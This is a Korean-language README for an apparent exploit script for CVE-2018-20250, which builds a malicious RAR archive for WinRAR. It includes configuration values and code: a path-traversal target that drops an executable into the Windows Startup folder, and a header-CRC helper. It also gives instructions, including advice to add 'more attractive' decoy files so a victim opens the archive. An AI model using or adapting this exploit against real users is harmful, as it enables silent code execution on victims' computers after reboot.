
CVE-2018-20250에 대한 익스플로잇 스크립트로, WinRAR의 ACE 파일 추출 취약점을 통해 코드 실행을 달성하기 위해 악성 RAR 아카이브를 자동으로 생성합니다.
exp for Winrar에서 코드 실행 추출
Ridter의 poc
사용 방법?
Python 3.7을 설치하고, 실행하려는 악성 파일을 준비한 다음 원하는 값을 설정하기만 하면 됩니다. 이 exp 스크립트가 자동으로 악성 아카이브 파일을 생성합니다!
... ...
# 원하는 아카이브 파일 이름
rar_filename = "test.rar"
# 실행하려는 악성 파일
evil_filename = "calc.exe"
# 원하는 압축 해제 경로 (아래 참조)
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# 피해자가 winrar를 열 때 표시될 다른 파일들
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
... ...
def get_right_hdr_crc(filename):
# 이 명령은 Python3 환경에 따라 다를 수 있습니다.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)
... ...
exp를 실행하면 test.rar가 자동으로 생성됩니다.
피해자가 test.rar를 열면 hello.txt와 world.txt 파일이 표시됩니다. 더 많은 파일, 더 매력적인 파일을 추가할 수도 있습니다.
![]()
hi.exe라는 파일이 하나 더 생깁니다. 실제로는 calc.exe입니다. 컴퓨터를 다시 시작하면 hi.exe가 실행됩니다.![]()
즐거운 시간 보내세요! :)